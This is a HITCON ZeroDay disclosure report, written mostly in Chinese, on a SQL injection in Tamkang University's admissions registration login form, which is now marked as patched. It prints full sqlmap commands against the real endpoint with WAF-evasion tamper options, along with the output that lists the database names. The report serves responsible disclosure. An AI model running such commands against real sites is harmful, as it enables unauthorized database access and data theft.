Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-01030
- Vendor: 淡江大學 115 學年度進修學士班(考試入學) 招生考試
- Title: 淡江大學 mysql注入漏洞
- Introduction: mysql注入漏洞
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2026/08/15 10:13:12 : 新提交 (由 桃園怪人協會幹部之一 更新此狀態)
- 2026/08/15 10:23:34 : 新提交 (由 桃園怪人協會幹部之一 更新此狀態)
- 2026/08/18 17:23:56 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/08/31 16:28:21 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/08/31 16:28:21 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/08/31 16:28:21 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/09/03 10:57:35 : 複測申請中 (由 組織帳號 更新此狀態)
- 2026/09/03 16:12:46 : 確認已修補 (由 桃園怪人協會幹部之一 更新此狀態)
- 2026/09/07 03:00:11 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-01030
- 通報者:koby12345 (桃園怪人協會幹部之一)
- 風險:低
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
※ 請使用 Chrome、Edge、Firefox 等瀏覽器。
※ 報名時間: 2026-07-30 10:00 至 2026-08-18 10:00。
換句話說 漏洞有效期間2026-08-18
自從我回報3天後 那我回報有效嗎?
查數據庫名 (e15ede)
sqlmap -u "https://ckaws0a.web.tku.edu.tw/ip/115/www/13320/sign_io.login_user" \
--data "user_id=a234123234a%40gmail.com&pwd=asdasdasd" \
-p "user_id" \
--dbms=mysql \
--current-db \
--batch \
--random-agent \
--threads 3 \
--tamper space2comment \
--hex
查身分 (ivp101@localhost)
sqlmap -u "https://ckaws0a.web.tku.edu.tw/ip/115/www/13320/sign_io.login_user" \
--data "user_id=a234123234a%40gmail.com&pwd=asdasdasd" \
-p "user_id" \
--dbms=mysql \
--sql-query "SELECT current_user" \
--batch \
--random-agent \
--tamper space2comment \
--hex
查DBA權限 無DBA
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.0
sqlmap -u "https://ckaws0a.web.tku.edu.tw/ip/115/www/13320/sign_io.login_user" \
--data "user_id=a234123234a%40gmail.com&pwd=asdasdasd" \
-p "user_id" \
--dbms=mysql \
--privileges \
--batch \
--random-agent \
--tamper space2comment \
--hex \
--time-sec 5
列舉數據庫
sqlmap -u "https://ckaws0a.web.tku.edu.tw/ip/115/www/13320/sign_io.login_user" \
--data "user_id=a234123234a%40gmail.com&pwd=asdasdasd" \
-p "user_id" \
--dbms=mysql \
--dbs \
--batch \
--random-agent \
--threads 3 \
--tamper space2comment \
--hex
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[10:02:38] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:02:43] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[10:02:49] [ERROR] invalid character detected. retrying..
[10:02:49] [WARNING] increasing time delay to 6 seconds
[10:04:02] [INFO] retrieved: 120
[10:12:01] [INFO] retrieved: information_schema
[10:16:04] [INFO] retrieved: admreport
[10:19:29] [INFO] retrieved: cmn14_b1
[10:22:42] [INFO] retrieved: cmn15_b1
[10:22:42] [INFO] retrieved:
不爬出整個數據庫了 跑太久